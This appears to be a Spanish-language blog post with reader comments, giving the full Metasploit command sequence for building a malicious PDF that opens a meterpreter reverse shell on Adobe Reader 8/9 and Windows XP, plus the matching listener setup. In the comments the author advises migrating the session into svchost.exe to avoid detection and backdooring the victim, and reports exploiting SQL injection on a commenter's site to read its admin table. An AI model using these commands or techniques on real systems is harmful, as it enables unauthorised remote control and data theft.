Vídeo donde se muestra la manipulación del Metasploit para obtener un PDF malintencionado que al abrirlo devuelve una shell que se conectar al atacante. El exploit mencionado afecta a las versiones de Adobe Reader v8.x, v9.x y a Windows XP SP3(2,1,0). Al final explico cada paso que se llevo a cabo en el vídeo:Aquí está el comando y entre corchetes [] la explicación:
use exploit/windows/fileformat/adobe_pdf_embedded_exe [El exploit para ejecutar un el PAYLOAD al abrir un PDF]
set FILENAME nombre_salida.pdf [El nombre que tendrá el PDF una vez modificado por msf]
set INFILENAME /root/nombre_entrada.pdf [El nombre del PDF que será infectado]
set OUTPUTPATH /root/ [Directorio donde se guardará el PDF]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP que estará a la escucha para que se conecte el PAYLOAD]
set LPORT 4455 [Puerto a la escucha]
set id 0 [El S.O. y la versión del Adobe Reader que vulnera el exploit]
exploitYa le dijimos al PDF donde se conectara y en que puerto, ahora hay que poner el MSF a la escucha:
back ["Atrás", dejamos de usar el exploit actual]
use exploit/multi/handler [El exploit para recibir a nuestro PAYLOAD]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP de nuestra máquina]
set LPORT 4455 [Puerto donde se conectarán]
set id 0 [Definimos los parametros del exploit]
exploit[+] Pruben con sus maquinas virtueles ;)
[+] Salu2
[+] ZioneR
Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.
Seria muy interesante y espero que si se pueda "infectar" un pdf que ya existe y no "crear" un pdf que si infectado pero vacio, seria algo obio creo.
ResponderEliminara hacer pruebas! y gracias por el aporte ZioneR :)
@»AngelitX«: En efecto puedes infectar un pdf que ya existe, con "set INFILENAME" elegimos el pdf que infectaremos, si omitimos "set INFILENAME" se creará un archivo en blanco pero con el PAYLOAD dentro.
ResponderEliminar[+] ZioneR
Una pregunta, la infeccion se hace en el PDF .. significa eso que si la victima cierra el pdf se pierde la sesion de meterpreter??
ResponderEliminarHabria que migrar el proceso al explorer lo mas rapido posible no ? O no seria necesario ? Cuanto dura la infeccion, por que persistente no es, que sabes de esto.
PD: Enhorabuena por el blog :)
@Anónimo: Viejo, tengo entendido que automáticamente el proceso se migra a notepad.exe así que si cierra el PDF seguiría la session activa, pero siempre es recomendado migrar el proceso a uno de sistema o uno difícil de detectar (ex. svchost.exe)...
ResponderEliminarPor lo demás la session no es persistente, si es cerrado el proceso o si es reiniciado el PC, la session se cierra. Pero puedes troyanizar, backdoorizar, activar el escritorio remoto, VNC...
[+] ZioneR
Este comentario ha sido eliminado por un administrador del blog.
ResponderEliminarMuy buen post. Yo solo sabia hacer ataques de denagación de servicios.
ResponderEliminarSaludos,
Amy Torsion
@Todo pasa por una razon:
ResponderEliminarViejo, la URL que posteaste, no sé si por spam o que... Esta horrorosamente vulnerable a SQLi
DB 1: tienda
information_schema.tables ACTIVADO!
57 Tablas incluyendo la del admin, y la contraseña ni siquiera está encriptada, realmente necesita una mano el webmaster de esa web :(
Panda corriendo sobre windows 7 detecta el script cuando se ejecuta. Aún asi... muy interesante.
ResponderEliminarRon.